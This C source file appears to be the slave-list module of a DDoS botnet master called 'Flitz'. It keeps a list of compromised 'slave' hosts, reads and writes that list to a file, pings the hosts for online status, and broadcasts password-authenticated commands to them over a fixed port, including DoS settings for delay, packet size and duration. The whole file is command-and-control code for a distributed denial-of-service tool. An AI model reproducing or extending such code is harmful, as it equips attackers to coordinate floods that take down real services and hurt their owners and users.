


#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "Flitz.h"
#include "Flitz-master.h"
#include "func.h"
#include "net.h"
#include "slavelist.h"
#include "xwrapper.h"



struct slave {
    char host[255];
    unsigned long uhost;
    unsigned int online;
    struct slave *next;
};


struct slave *slavelist;



void slavelist_add(int nr, char *h)
{
    unsigned long uh;
    struct slave *new;

    if ((uh = func_resolve(h)) == 0) {
        net_send(nr, "Not a valid IP address.\n");
        return;
    }
    new = (struct slave *) malloc(sizeof(struct slave));
    memset(new, 0x00, sizeof(struct slave));
    if (new != NULL) {
        memset(new->host, 0x00, sizeof(new->host));
        strncpy(new->host, h, sizeof(new->host) - 1);
        new->uhost = uh;
        new->online = 0;
        new->next = slavelist;
        slavelist = new;
        net_send(nr, "IP address added to the slave list\n");
        slavelist_pall();
        return;
    }
    net_send(nr, "Error adding IP address (no more memory).\n");
    return;
}



void slavelist_del(int nr, int nummer)
{
    int cnt;
    char str[1024];
    struct slave *first, *current, *nex;

    cnt = 0;
    first = NULL;
    current = slavelist;
    while (current) {
        ++cnt;
        if (cnt == nummer) {
            nex = current->next;
            memset(str, 0x00, 1024);
            snprintf(str, 1024, "801 %s\n", PASS_SLAVE);
            net_writeslave(current->uhost, SLAVE_PORT, str);
            free(current);
            if (first == NULL) {
                slavelist = nex;
                return;
            }
            first->next = nex;
            return;
        }
        first = current;
        current = current->next;
    }
    return;
}
            


void slavelist_online(int nr)
{
    int cnt;
    struct slave *s;

    s = slavelist;
    cnt = 0;

    while (s) {
        ++cnt;
        if (cnt == nr) {
            s->online = 1;
        }
        s = s->next;
    }
    return;
}



void slavelist_printlist(int nr)
{
    int cnt, on;
    struct slave *s;

    s = slavelist;
    cnt = 0;
    on = 0;
    net_send(nr, "\n\nSLAVE LIST:\n");
    net_send(nr, "======================================================");
    net_send(nr, "==========================\n");
    while (s) {
        ++cnt;
        net_send(nr, "%-6d:  %-20s ", cnt, s->host);
        if (s->online == 1) {
            net_send(nr, "  : ONLINE\n");
            ++on;
        }
        else {
            net_send(nr, "  : OFFLINE / WAITING FOR REPLY\n");
        }
        s = s->next;
    }
    net_send(nr, "\nTotal slaves: %d  Total online: %d  ", cnt, on);
    net_send(nr, "Total offline: %d.\n", cnt - on);
    return;
}



void slavelist_sendsetting()
{
    char str[1024];
    struct slave *s;

    s = slavelist;
    while (s) {
        memset(str, 0x00, 1024);
        snprintf(str, 1024, "400 %s %d %d %d\n", PASS_SLAVE,
                 setting.dos_delay, setting.dos_size, setting.dos_time);
        net_writeslave(s->uhost, SLAVE_PORT, str);
        s = s->next;
    }
    return;
}



void slavelist_pall()
{
    int cnt;
    char str[1024];
    struct slave *s;

    s = slavelist;
    cnt = 0;
    while (s) {
        ++cnt;
        s->online = 0;
        memset(str, 0x00, 1024);
        snprintf(str, 1024, "800 %s %d\n", PASS_SLAVE, cnt);
        net_writeslave(s->uhost, SLAVE_PORT, str);
        s = s->next;
    }
    return;
}



void slavelist_wall(char *data, ...)
{
    char str[1024];
    struct slave *s;
    va_list line;

    memset(&line, 0x00, sizeof(line));
    va_start(line, data);
    vsnprintf(str, 1024, data, line);
    va_end(line);

    s = slavelist;
    while (s) {
        net_writeslave(s->uhost, SLAVE_PORT, str);
        s = s->next;
    }
    return;
}



void slavelist_file_read()
{
    char ip[256];
    FILE *in;
    struct slave *new;

    slavelist = NULL;
    if ((in = fopen(SLAVE_LIST, "r")) == 0) {
        return;
    }

    while (fgets(ip, 256, in) != NULL) {
        if (ip[strlen(ip) - 1] == '\n') {
            ip[strlen(ip) - 1] = '\0';
        }
        if (func_resolve(ip) == 0) {
            continue;
        }
        new = (struct slave *) xmalloc(sizeof(struct slave));
        if (new != NULL) {
            memset(new->host, 0x00, sizeof(new->host));
            strncpy(new->host, ip, sizeof(new->host) - 1);
            new->online = 0;
            new->next = slavelist;
            slavelist = new;
        }
    }
    fclose(in);
    slavelist_pall();
    return;
}



void slavelist_file_write()
{
    FILE *out;
    struct slave *s;

    if ((out = fopen(SLAVE_LIST, "w")) == 0) {
        return;
    }

    s = slavelist;
    while (s) {
        fprintf(out, "%s\n", s->host);
        s = s->next;
    }
    fclose(out);
    return;
}
